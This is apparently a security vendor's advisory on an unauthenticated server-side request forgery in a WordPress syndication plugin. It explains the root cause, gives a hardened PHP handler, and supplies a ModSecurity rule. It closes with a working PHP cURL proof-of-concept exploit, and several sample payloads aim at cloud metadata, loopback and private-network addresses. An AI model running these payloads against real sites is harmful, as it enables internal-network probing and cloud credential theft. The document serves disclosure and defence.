Atomic Edge analysis of CVE-2026-3478 (metadata-based):
This vulnerability is an unauthenticated Server-Side Request Forgery (SSRF) in the Content Syndication Toolkit WordPress plugin, version 1.3 and earlier. The flaw resides in a proxy endpoint registered via the plugin's bundled ReduxFramework library. The published CVSS score is 7.2 (High), indicating a significant risk to confidentiality and integrity.
Atomic Edge research identifies the root cause as an AJAX handler registered on the `wp_ajax_nopriv_redux_p` hook. `admin-ajax.php` dispatches the `nopriv` variant for visitors who are not logged in, so the endpoint is reachable without authentication. The handler's `proxy()` method takes a `url` parameter directly from the `$_GET` superglobal. The advisory describes the validation regex as `/.*/`, which matches any input, so no filtering takes place. The URL is then passed to `wp_remote_request()`, which, unlike `wp_safe_remote_request()`, does not reject loopback, private-range or link-local destinations. The combination of no capability check, no nonce verification and no URL allowlist creates the SSRF condition. These conclusions are inferred from the CWE classification and the published vulnerability description; the source code was not available for direct review.
Exploitation requires only a crafted GET request to the site's WordPress AJAX endpoint, `/wp-admin/admin-ajax.php`, with the `action` parameter set to `redux_p` and the `url` parameter set to any internal or external address. For example, an attacker could probe the local network with `url=http://192.168.1.1:8080/` or read cloud instance metadata with `url=http://169.254.169.254/latest/meta-data/`. The WordPress server issues the request on the attacker's behalf and returns the response body, enabling direct information disclosure.
Effective remediation requires several layers of controls. The AJAX action must be registered only for authenticated users, using `wp_ajax_redux_p` and dropping the `wp_ajax_nopriv_redux_p` registration. The handler must check capability, for example `current_user_can('manage_options')`, and verify a nonce (`check_ajax_referer()`) so that a logged-in administrator cannot be made to trigger the request via CSRF. Most critically, the `url` parameter must be strictly validated. The plugin should enforce an allowlist of permitted hosts or, at minimum, use `wp_safe_remote_request()`, which runs `wp_http_validate_url()` to reject non-http(s) schemes and loopback, private-range and link-local addresses. Note that `wp_http_validate_url()` resolves the hostname at validation time and the HTTP client resolves it again when connecting, so a name-based allowlist is a stronger control than IP blocking alone. Input that does not match the predefined safe pattern must be rejected before any request is made.
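The following is an added example, not the plugin's or Atomic Edge's code, showing what the root cause described above looks like once fixed: a validator that enforces the scheme, allowlist and private-address checks, wired to an authenticated-only AJAX hook with nonce and capability checks. The hook name `redux_p` comes from the advisory; the function names, the nonce action `safe_proxy`, the allowlist entries and the DNS table used by the stand-alone demo are assumptions constructed for illustration.

```php
<?php
// Added example, not the plugin's or Atomic Edge's code: a hardened replacement for
// the proxy handler described above. The hook name `redux_p` comes from the advisory;
// the nonce action, function names and allowlist entries are assumptions.

// Hosts the proxy may fetch from. An empty list is the "at minimum" posture (IP checks only).
const SAFE_PROXY_ALLOWED_HOSTS = ['feeds.example.com'];

/**
 * Return $url if it is safe to fetch, null otherwise. Rejects non-http(s) schemes,
 * userinfo tricks, hosts off the allowlist, and any host that is or resolves to a
 * loopback, RFC 1918, link-local (incl. 169.254.169.254) or otherwise reserved address.
 * $resolver lets the demo inject DNS; production uses gethostbynamel().
 */
function safe_proxy_validate_url(string $url, array $allowed_hosts, ?callable $resolver = null): ?string
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;                                   // file://, gopher://, php:// ...
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;                                   // http://allowed.example.com@127.0.0.1/
    }
    $host = strtolower(trim($parts['host'], '[]'));   // parse_url keeps [] on IPv6 literals
    if ($allowed_hosts !== [] && !in_array($host, $allowed_hosts, true)) {
        return null;
    }
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        $addresses = [$host];                          // literal IP: nothing to resolve
    } else {
        $addresses = ($resolver ?? 'gethostbynamel')($host);
        if (!is_array($addresses) || $addresses === []) {
            return null;                               // unresolvable: fail closed
        }
    }
    foreach ($addresses as $ip) {
        // NO_PRIV_RANGE: 10/8, 172.16/12, 192.168/16, fc00::/7.
        // NO_RES_RANGE: 0/8, 127/8, 169.254/16, 240/4, ::1, ::/128, fe80::/10, ...
        if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            return null;
        }
    }
    return $url;
}

// WordPress wiring. Only the authenticated hook is registered: there is no
// wp_ajax_nopriv_redux_p, so anonymous requests never reach the handler.
if (function_exists('add_action')) {
    add_action('wp_ajax_redux_p', 'safe_proxy_ajax_handler');
}

function safe_proxy_ajax_handler(): void
{
    // CSRF: dies unless a valid nonce from wp_create_nonce('safe_proxy') is sent as _wpnonce.
    check_ajax_referer('safe_proxy', '_wpnonce');
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);
    }
    $url = safe_proxy_validate_url((string) ($_GET['url'] ?? ''), SAFE_PROXY_ALLOWED_HOSTS);
    if ($url === null) {
        wp_send_json_error('url not permitted', 400);
    }
    // wp_safe_remote_request() sets reject_unsafe_urls, so WordPress re-runs
    // wp_http_validate_url() on the URL and on each redirect hop before connecting.
    $response = wp_safe_remote_request($url, ['timeout' => 5, 'redirection' => 2]);
    if (is_wp_error($response)) {
        wp_send_json_error($response->get_error_message(), 502);
    }
    wp_send_json_success(wp_remote_retrieve_body($response));
}

// Stand-alone demo (php safe_proxy.php): the page's payloads against both postures,
// with a constructed DNS table so it runs offline.
if (PHP_SAPI === 'cli' && !function_exists('add_action')) {
    $fake_dns = function (string $host): array {
        $table = ['feeds.example.com' => ['203.0.113.10'], 'rebound.example.com' => ['10.0.0.5']];
        return $table[$host] ?? [];
    };
    $probes = [
        'http://127.0.0.1:8080/',                    // PoC payload: loopback
        'http://169.254.169.254/latest/meta-data/',  // cloud metadata
        'http://192.168.1.1:8080/',                  // RFC 1918
        'http://[::1]:8080/',                        // IPv6 loopback
        'file:///etc/passwd',                        // non-http scheme
        'http://feeds.example.com@127.0.0.1/',       // userinfo trick
        'https://rebound.example.com/feed.xml',      // public name resolving into the private network
        'https://feeds.example.com/feed.xml',        // legitimate
    ];
    foreach ($probes as $probe) {
        $ip_only   = safe_proxy_validate_url($probe, [], $fake_dns) ? 'allow' : 'deny';
        $allowlist = safe_proxy_validate_url($probe, SAFE_PROXY_ALLOWED_HOSTS, $fake_dns) ? 'allow' : 'deny';
        printf("%-44s ip-check-only: %-5s allowlist: %s\n", $probe, $ip_only, $allowlist);
    }
}
```

Run from the command line, every probe except the legitimate feed URL is denied under both postures; only `rebound.example.com`, which is rejected by the resolved-address check in IP-only mode and by the allowlist in strict mode, shows why the two layers differ. Two caveats: `gethostbynamel()` returns only A records, so an allowlisted name with AAAA records alone fails closed, and the resolved-address check is advisory against DNS rebinding since the HTTP client resolves the name again, which is why the allowlist is the primary control.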
The impact of successful exploitation is significant. Attackers can use the vulnerable server as a proxy to scan internal networks, potentially discovering other vulnerable services. They can interact with internal APIs that are not exposed to the internet, leading to data modification or theft. Access to cloud instance metadata endpoints can result in the compromise of access keys and full cloud account takeover. The full-read nature of the SSRF allows attackers to exfiltrate sensitive data from these internal sources directly.
Below is our ModSecurity-compatible rule for this CVE. It is a virtual patch for the request pattern described above, not a substitute for fixing the handler.
# Atomic Edge WAF Rule - CVE-2026-3478 (metadata-based)
#
# REQUEST_FILENAME is the request path without the query string. REQUEST_URI
# includes "?action=redux_p&url=...", so a plain @streq on it would never fire;
# @endsWith also covers installs served from a subdirectory.
#
# admin-ajax.php reads `action` from $_REQUEST, so it may arrive in a POST body
# while `url` stays in the query string (the handler reads it from $_GET): match
# action across all argument sources (ARGS), not only ARGS_GET.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
    "id:20263478,phase:2,deny,status:403,chain,msg:'CVE-2026-3478: Unauthenticated SSRF via Content Syndication Toolkit redux_p AJAX action',severity:'CRITICAL',tag:'CVE-2026-3478',tag:'WordPress',tag:'Plugin-Content-Syndication-Toolkit',tag:'Attack/SSRF'"
    SecRule ARGS:action "@streq redux_p" "t:none,chain"
    SecRule ARGS_GET:url "@rx ^https?://" \
        "t:none,t:lowercase,setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',setvar:'tx.ssrf_score=+%{tx.critical_anomaly_score}'"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3478 - Content Syndication Toolkit <= 1.3 - Unauthenticated Server-Side Request Forgery via 'url' Parameter
// (The opening <?php tag must precede this header; anything before it is sent to the client as literal output.)
$target_url = 'https://vulnerable-wordpress-site.com';
// The vulnerable AJAX endpoint
$ajax_endpoint = '/wp-admin/admin-ajax.php';
// The vulnerable action parameter value
$action = 'redux_p';
// The internal target to probe via SSRF (example: localhost port 8080)
$internal_target = 'http://127.0.0.1:8080/';
// Construct the full exploit URL
$exploit_url = $target_url . $ajax_endpoint . '?action=' . urlencode($action) . '&url=' . urlencode($internal_target);
echo "[*] Atomic Edge SSRF PoC for CVE-2026-3478\n";
echo "[*] Target: $target_url\n";
echo "[*] Probing: $internal_target\n";
echo "[*] Sending request to: $exploit_url\n\n";
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Follow redirects if the target does
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// Set a user-agent to mimic a regular browser
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Atomic Edge Research)');
// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);
if ($error) {
    echo "[!] cURL Error: $error\n";
} else {
    echo "[+] HTTP Response Code: $http_code\n";
    echo "[+] Response Body (first 2000 chars):\n\n";
    echo substr($response, 0, 2000) . "\n";
    if (strlen($response) > 2000) {
        echo "... (truncated)\n";
    }
}
// Example alternative payloads for different attack scenarios
/*
// Cloud metadata endpoint (AWS)
$payload_aws = 'http://169.254.169.254/latest/meta-data/';
// Internal network scan
$payload_scan = 'http://192.168.1.100:22/';
// Sensitive internal service
$payload_service = 'http://internal-api.local/admin';
*/
?>